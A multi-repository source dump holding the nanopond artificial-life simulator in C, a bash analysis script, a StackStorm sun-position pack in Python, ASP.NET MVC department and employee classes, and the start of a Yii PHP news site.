if (c->generation > maxGeneration)
maxGeneration = c->generation;
}
}
}
/* Here are the columns in the CSV output if you're curious */
printf("%llu,%llu,%llu,%llu,%llu\n",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
(uint64_t)maxGeneration
);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
}
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
*/
static void dumpCell(FILE *file, struct Cell *cell)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
if (cell->energy&&(cell->generation > 2)) {
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
/* Four STOP instructions in a row is considered the end.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4;
} else shiftPtr = 0;
}
}
fprintf(file,"\n");
}
}
/**
* Dumps all viable (generation > 2) cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static void doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
uintptr_t x,y;
sprintf(buf,"%llu.dump",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
fprintf(stderr,"[INFO] Dumping viable cells to %s\n",buf);
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y)
dumpCell(d, &pond[x][y]);
}
fclose(d);
}
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
/**
* Determines if c1 is allowed to access c2
*
* Access is permitted if:
* c2 has no energy
* c2 has a parent ID of zero
* c2's logo equals c1's "guess"
*
* @param c1 Cell trying to access
* @param c2 Cell being accessed
* @param c1guess c1's "guess"
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c1,struct Cell *const c2,const uintptr_t c1guess)
{
if (!c2->energy)
return 1;
if (!c2->parentID)
return 1;
if ((c2->genome[0] & 0xf) == (c1guess & 0xf))
return 1;
return 0;
}
#ifdef USE_SDL
/**
* Sets the palette.
*
* The first 64 colors are grays.
* The last 192 colors are a HSV-rainbow.
*/
static void initPalette(SDL_Surface *surface)
{
uintptr_t i,h,f;
SDL_Color palette[256];
/* Make grays. */
for (i=0; i<64;++i) {
f = i * 4;
palette[i].r=f; palette[i].g=f; palette[i].b=f;
}
/* Make rainbow. */
for (i=64;i<256;++i) {
h = (i-64) >> 5;
f = (i-64) & 0x1f;
if (h&1) f = 0x20 - f; /* if h is odd */
f <<= 3;
switch (h) {
case 0:
palette[i].r=255; palette[i].g=f; palette[i].b=0;
break;
case 1:
palette[i].r=f; palette[i].g=255; palette[i].b=0;
break;
case 2:
palette[i].r=0; palette[i].g=255; palette[i].b=f;
break;
case 3:
palette[i].r=0; palette[i].g=f; palette[i].b=255;
break;
case 4:
palette[i].r=f; palette[i].g=0; palette[i].b=255;
break;
case 5:
palette[i].r=255; palette[i].g=0; palette[i].b=f;
break;
}
}
/* Set palette. */
SDL_SetColors(surface, palette, 0, 256);
}
#endif /* USE_SDL */
/**
* Gets the color that a cell should be
*
* This is only used if SDL is enabled.
*
* The colors are determined according to different color schemes. (The
* schemes can be switched with the right mouse button.)
*
* @param c Cell to get color for
* @return 8-bit color value
*/
static inline Uint8 getColor(struct Cell *c)
{
uintptr_t sum,i,j,word,opcode;
switch (color_scheme) {
case MIXED:
/*
* For cells of generation > 1, saturation and value are set to maximum.
* The hue will be (usually) different even for slightly differing genomes.
*
* A cell with generation <= 1 is gray, the lightness depending on its
* energy. Cells with no energy are black.
*/
if (c->energy) {
if (c->generation > 1) {
sum = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i)
sum += c->genome[i];
j = 0;
for(i=0;i<sizeof(uintptr_t);++i) {
j ^= sum & 0xff;
sum >>= 8;
}
return (j % 192) + 64;
}
return (c->energy * 64) / (INFLOW_RATE_BASE + INFLOW_RATE_VARIATION);
}
return 0;
case KINSHIP:
/*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
* Therefore the difference in hue should to some extent reflect the grade
* of "kinship" of two cells.
*
* A cell with generation <= 1 is gray, the lightness depending on its
* energy. Cells with no energy are black.
*/
if (c->energy) {
if (c->generation > 1) {
sum = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i) {
word=c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
* the genomes is slightly longer and uses one more maschine
* word. */
opcode = word & 0xf;
if (opcode == 0xf) continue;
sum += opcode;
}
}
/* For the hash-value use a wrapped around sum of the sum of all
commands and the length of the genome. */
return (sum % 192) + 64;
}
return (c->energy * 64) / (INFLOW_RATE_BASE + INFLOW_RATE_VARIATION);
}
return 0;
case MAX_COLOR_SCHEME:
/* Suppress warning. */
return 0;
}
return 0;
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i;
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Seed and init the random number generator */
__randCounter = __randState = time(NULL);
for(i=0;i<1024;++i)
getRandom();
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
initPalette(screen);
#endif /* USE_SDL */
/* Clear the pond */
for(i=0;i<sizeof(pond);++i)
((uint8_t *)&pond)[i] = (uint8_t)0;
/* Clock is incremented on each core loop */
uint64_t clock = 0;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 0;
/* Miscellaneous variables used in the loop */
uintptr_t currentWord,wordPtr,shiftPtr,inst,x,y,tmp;
struct Cell *pptr,*tmpptr;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* "Spare" register that can be swapped to/from */
uintptr_t sptr_wordPtr;
uintptr_t sptr_shiftPtr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
/* If this is nonzero, execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
for(;;) {
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY)) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
}
if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",
sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y]);
break;
case SDL_BUTTON_RIGHT:
/* Switch color scheme. */
{
uintptr_t x, y;
color_scheme = (color_scheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",
color_scheme_names[color_scheme]);
for (y=0;y<POND_SIZE_Y;++y)
for (x=0;x<POND_SIZE_X;++x) {
((uint8_t *)screen->pixels)[x + (y * sdlPitch)]
= getColor(&pond[x][y]);
}
break;
}
}
}
}
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
#endif /* USE_SDL */
}
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY))
doDump(clock);
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
pptr->ID = ++cellIdCounter;
pptr->parentID = 0;
pptr->generation = 0;
pptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pptr->genome[i] = getRandom();
/* If enabled, make this a synthetic replicator every once in a while.
* This is mainly just for debugging and is normally not defined. */
#ifdef SYNTHETIC_REPLICATOR
if ((getRandom() & 0xffff) < 3) {
/* These digits constitute a very simple self-replicating loop. */
pptr->genome[0] = 0x0a185933;
fprintf(stderr,"[INFO] Dropped a synthetic replicator!\n");
}
#endif /* SYNTHETIC_REPLICATOR */
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
/* Reset the state of the VM prior to execution */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
outputBuf[i] = ~((uintptr_t)0); /* ~0 == 0xfffff... */
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
sptr_wordPtr = 0;
sptr_shiftPtr = 0;
reg = 0;
loopStackPtr = 0;
wordPtr = 0;
shiftPtr = 4; /* The first four bits are the 'logo' and are skipped! */
facing = getRandom() & 3; /* Cells start facing in a random direction */
falseLoopDepth = 0;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Core execution loop */
while (pptr->energy&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
tmp = getRandom(); /* Call getRandom() only once for speed */
if ((tmp & 0xffffffff) < MUTATION_RATE) {
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0x8) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0x9) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
switch(inst) {
case 0x0: /* NOP: No operation */
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
loopStack_wordPtr[loopStackPtr] = wordPtr;
loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = loopStack_wordPtr[loopStackPtr];
shiftPtr = loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* TURN: Turn in the direction specified by register */
facing = reg & 3;
break;
case 0xc: /* SWAP: Swap active and saved copies of pointer */
tmp = ptr_wordPtr;
ptr_wordPtr = sptr_wordPtr;
sptr_wordPtr = tmp;
tmp = ptr_shiftPtr;
ptr_shiftPtr = sptr_shiftPtr;
sptr_shiftPtr = tmp;
break;
case 0xd: /* SET: Skip next instruction and set register equal to it */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4;
} else shiftPtr = 4;
currentWord = pptr->genome[wordPtr];
}
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
break;
case 0xe: /* SHARE: Attempt to share energy (50-50) with neighbor */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(pptr,tmpptr,reg)) {
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4; /* Remember: first four bits are the 'logo' */
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,facing);
if ((tmpptr->energy)&&accessAllowed(pptr,tmpptr,reg)) {
tmpptr->ID = ++cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->generation = pptr->generation + 1;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = outputBuf[i];
}
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
}
<file_sep>#!/bin/bash
#
# This script should be executed from *within* the directory containing
# a series of compressed .dump.csv.bz2 files. (If all are not compressed,
# they should be.)
#
# This script will run each file through the information content test and
# then generate a merged trial-data.csv file ready for statistical
# and graphical analysis.
#
# The bzip2/bunzip2 programs must be installed.
#
# Delete old results if any
rm -f *.packed trial-data.csv
# Figure out the nonredundant information content of all the genomes in
# each genome dump.
for i in *.dump.csv.bz2; do
bunzip2 -dc $i | ruby ../genomeDumpPredigestInformation.rb | bzip2 -9 >$i.packed
echo $i digested to $i.packed
done
|
32a2d848f4dc28017f98782f317c32a11930584f
|
[
"C",
"Makefile",
"Ruby",
"Shell"
] | 7 |
C
|
adamierymenko/nanopond
|
77b9c4ae49a03a0c5ef9829effd1e2bb6b495fb2
|
4e6aeb48a02151f0dc5b64adcf648660ccd9a945
|
refs/heads/master
|
<repo_name>StackStorm-Exchange/stackstorm-astral<file_sep>/actions/lib/action.py
"""
Copyright 2016 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from st2common.runners.base_action import Action
try:
# The astral module was broken up into a package in astral 2.0, so use
# the updated import
from astral.location import Location
except ImportError:
# Astral only installs <1.10 for Python < 3, so use the old import
from astral import Location
class BaseAction(Action):
def __init__(self, config):
super(BaseAction, self).__init__(config)
self._latitude = self.config['latitude']
self._longitude = self.config['longitude']
self._timezone = self.config['timezone']
location = Location(('name', 'region', float(self._latitude),
float(self._longitude), self._timezone, 0))
self.sun = location.sun()
<file_sep>/sensors/astral_sun_sensor.py
from st2reactor.sensor.base import PollingSensor
import st2common.util.date as date
try:
# The astral module was broken up into a package in astral 2.0, so use
# the updated import
from astral.location import Location
except ImportError:
# Astral only installs <1.10 for Python < 3, so use the old import
from astral import Location
__all__ = [
'AstralSunSensor'
]
class AstralSunSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=None):
super(AstralSunSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._logger = self._sensor_service.get_logger(__name__)
def setup(self):
self._latitude = self._config['latitude']
self._longitude = self._config['longitude']
self._update_sun_info()
self._update_counter = 0
def poll(self):
if self._update_counter > 60:
self._update_sun_info()
self._update_counter = 0
checks = ['dawn', 'sunrise', 'sunset', 'dusk']
currenttime = date.get_datetime_utc_now()
self._logger.debug("Checking current time %s for sun information" %
str(currenttime))
for key in checks:
if self.is_within_minute(self.sun[key], currenttime):
trigger = 'astral.' + key
self.sensor_service.dispatch(trigger=trigger, payload={})
self._update_counter += 1
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _update_sun_info(self):
location = Location(('name', 'region', float(self._latitude),
float(self._longitude), 'GMT+0', 0))
self.sun = location.sun()
def is_within_minute(self, time1, time2):
timediff = time1 - time2
diff = abs(timediff.total_seconds() // 60)
if diff < 1:
return True
return False
<file_sep>/CHANGES.md
# Change Log
## 1.0.0
* Drop Python 2.7 support
# 0.2.2
- Add explicit support for Python 2 and 3
- Fix import for astral 2+ (available on Python 3.6+ only)
# 0.2.0
- Updated action `runner_type` from `run-python` to `python-script`
<file_sep>/README.md
# Astral Pack
This pack provides a sensor with four triggers for initiating workflows based
on sun position for a geo lat/long coordinates:
### Configuration file:
Copy and edit the astral.yaml.example into the /opt/stackstorm/configs directory.
**Note** : When modifying the configuration in `/opt/stackstorm/configs/` please
remember to tell StackStorm to load these new values by running
`st2ctl reload --register-configs`
### Triggers:
```text
astral.dawn
astral.sunrise
astral.sunset
astral.dusk
```
### Actions:
#### get_dawn
Returns the time in the morning when the sun is a specific number of degrees below the horizon in UTC for the current day.
#### get_sunrise
Returns the time in the morning when the top of the sun breaks the horizon in UTC for the current day
#### get_sunset
Returns the time in the evening when the sun is about to disappear below the horizon in UTC for the current day
#### get_dusk
Returns the time in the evening when the sun is a specific number of degrees below the horizon in UTC for the current day.
|
f1d80a942dfa69c1162df2625d14ad6adda0b797
|
[
"Markdown",
"Python"
] | 4 |
Python
|
StackStorm-Exchange/stackstorm-astral
|
b1540cece62bc7c80255cd38a9a07e632e865f97
|
f4bbed895b9db416a461212033ec8f863e06b683
|
refs/heads/master
|
<repo_name>AirN05/ASP.NET<file_sep>/1lab/WebApplication1/Controllers/HomeController.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using WebApplication1.Models;
using System.Web.Security;
namespace WebApplication1.Controllers
{
public class HomeController : Controller
{
public ActionResult Index()
{
return View();
}
public ActionResult About()
{
ViewBag.Message = "Your application description page.";
return View();
}
public ActionResult Contact()
{
ViewBag.Message = "Your contact page.";
return View();
}
public ActionResult myHierarchy()
{
List<Department> depts = new List<Department>();
for (int i = 0; i < 3; i++)
{
List<Employee> employees = new List<Employee>();
for (int j = 0; j < 3; j++)
{
Employee emp = new Employee("Александр."+j+"."+i, j+i, "444"+i+j);
employees.Add(emp);
}
Department dept = new Department("dept" + i, i, "street" + i, "8800555353" + i, employees, null);
depts.Add(dept);
}
Employee emp1 = new Employee("Саша.А.А.", 5, "44467");
List<Employee> employees1 = new List<Employee>();
employees1.Add(emp1);
Department dept1 = new Department("deptMain", 0, "streetMain", "8800555353", employees1, depts);
return View(dept1);
}
[HttpPost]
[ValidateAntiForgeryToken]
public ActionResult About(User modelUser)
{
if (ModelState.IsValid)
{
if (FormsAuthentication.Authenticate(modelUser.login, modelUser.password))
{
FormsAuthentication.SetAuthCookie(modelUser.login, false);
return View(modelUser);
}
else
{
ModelState.AddModelError("", "The user name or password provided is incorrect.");
}
}
return View(modelUser);
}
}
}<file_sep>/1lab/WebApplication1/Models/Department.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace WebApplication1.Models
{
public class Department
{
public string name { get; set; }
public int count { get; set; }
public string address { get; set; }
public string depPhone { get; set; }
public List<Employee> employees { get; set; }
public List<Department> subDept { get; set; }
public Department( string name, int count, string address, string depPhone, List<Employee> employees, List<Department> subDept)
{
this.name = name;
this.count = count;
this.address = address;
this.depPhone = depPhone;
this.employees = employees;
this.subDept = subDept;
}
}
}<file_sep>/1lab/WebApplication1/Models/Employee.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace WebApplication1.Models
{
public class Employee
{
public string FIO { get; set; }
public int age { get; set; }
public string phone { get; set; }
public Employee(string FIO, int age, string phone)
{
this.FIO = FIO;
this.age = age;
this.phone = phone;
}
}
}
|
470fab2ac871fdcc13161921c368abe4265b8af1
|
[
"C#"
] | 3 |
C#
|
AirN05/ASP.NET
|
bd97cb07ffe8564354ac2bb0e64f48ba06ac6b96
|
3485b45a8cc8a327c2a0cf0a6047a2299ebddd25
|
refs/heads/master
|
<repo_name>Savoy/News_test<file_sep>/README.md
# News test - простейший новостной сайт
Сайт выводит новости в порядке их добавления. Для просмотра самой новости необходима регистрация, а для добавления новостей необходимы права модератора.
Администратор может добавлять пользователей самостоятельно или редактировать/давать права уже существующим.
После применения миграций создается главный администратор с доступами: <b>admin/admin</b>
Через редактирование профиля необходимо указать корректный адрес почты администратору для получения уведомлений и рекомендуется сменить пароль.
Затраты по времени ориентировочно 6 часов.
<file_sep>/views/news/view.php
<?php
/* @var $this yii\web\View */
/* @var $model app\models\News */
use yii\helpers\Html;
use yii\widgets\DetailView;
use yii\bootstrap\Alert;
$this->title = $model->title;
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="news-view">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->session->hasFlash('successCreated')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Новость была успешно добавлена.'
]); ?>
<?php if (Yii::$app->session->hasFlash('successUpdated')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Изменения были успешно сохранены.'
]); ?>
<?php if (Yii::$app->user->identity->type >= \app\models\User::TYPE_MODERATOR): ?><p>
<?= Html::a('Редактировать', ['update', 'id' => $model->id], ['class' => 'btn btn-primary']) ?>
<?= Html::a('Удалить', ['delete', 'id' => $model->id], [
'class' => 'btn btn-danger',
'data' => [
'confirm' => 'Вы уверены, что хотите удалить этот элемент?',
'method' => 'post',
],
]) ?>
</p><?php endif; ?>
<?=DetailView::widget([
'model' => $model,
'attributes' => [
'id',
'date_creation',
'user.name',
'title',
'about',
'text:ntext'
]
]) ?>
</div>
<file_sep>/views/site/_news_item.php
<?php
/**
* Author: SAnV
* Date: 11.10.2017
* Time: 16:14
*
* @var $model app\models\News
*/
?>
<div class="row">
<hr>
<h2><?=$model->title ?> <small>добавлено пользователем <?=$model->user->name ?> (<?=date_create($model->date_creation)->format('d.m.Y H:i') ?>)</small></h2>
<p><?=$model->about ?></p>
<div><?=\yii\helpers\Html::a('Подробнее', ['/news/view', 'id'=>$model->id]) ?></div>
</div>
<file_sep>/views/site/index.php
<?php
/* @var $this yii\web\View */
/* @var $dataProvider yii\data\ActiveDataProvider */
use yii\helpers\Html;
use yii\helpers\Url;
use yii\widgets\ListView;
$this->title = Yii::$app->name;
?>
<div class="news-index">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->user->identity->type >= \app\models\User::TYPE_MODERATOR): ?>
<p><?= Html::a('Добавить новость', ['news/create'], ['class' => 'btn btn-success']) ?></p>
<?php endif; ?>
<div class="pull-right">Количество новостей на странице:
<?=Html::a(1, Url::current(['per-page' => 1])) ?>
<?=Html::a(5, Url::current(['per-page' => 5])) ?>
<?=Html::a(10, Url::current(['per-page' => 10])) ?>
<?=Html::a(50, Url::current(['per-page' => 50])) ?>
<?=Html::a(100, Url::current(['per-page' => 100])) ?>
</div>
<?=ListView::widget([
'dataProvider' => $dataProvider,
'itemView' => '_news_item',
'summary' => false
]); ?>
</div>
<file_sep>/models/User.php
<?php
namespace app\models;
use Yii;
use yii\db\Expression;
use yii\helpers\Html;
use yii\helpers\Url;
/**
* This is the model class for table "user".
*
* @property integer $id
* @property string $name
* @property string $email
* @property resource $password
* @property string $hash
* @property integer $type
* @property integer $status
* @property string $date_creation
* @property string $date_modification
*/
class User extends \yii\db\ActiveRecord implements \yii\web\IdentityInterface {
const TYPE_ADMIN = 3;
const TYPE_MODERATOR = 2;
const TYPE_USER = 1;
const STATUS_INACTIVE = null;
const STATUS_ACTIVE = 1;
const SUPER_ADMIN_ID = 1;
public $newPassword, $confirmPassword;
/**
* @inheritdoc
*/
public static function tableName() {
return 'user';
}
/**
* @inheritdoc
*/
public function rules() {
return [
[['name', 'email'], 'required'],
[['name'], 'string', 'max' => 32],
[['email'], 'email'],
[['email'], 'unique'],
[['email', 'hash'], 'string', 'max' => 64],
//[['type', 'status'], 'integer'],
[['newPassword', 'confirmPassword'], 'required', 'on'=>'register'],
[['newPassword', 'confirmPassword'], 'safe'],
[['confirmPassword'], 'compare', 'compareAttribute'=>'newPassword', 'skipOnError'=>true],
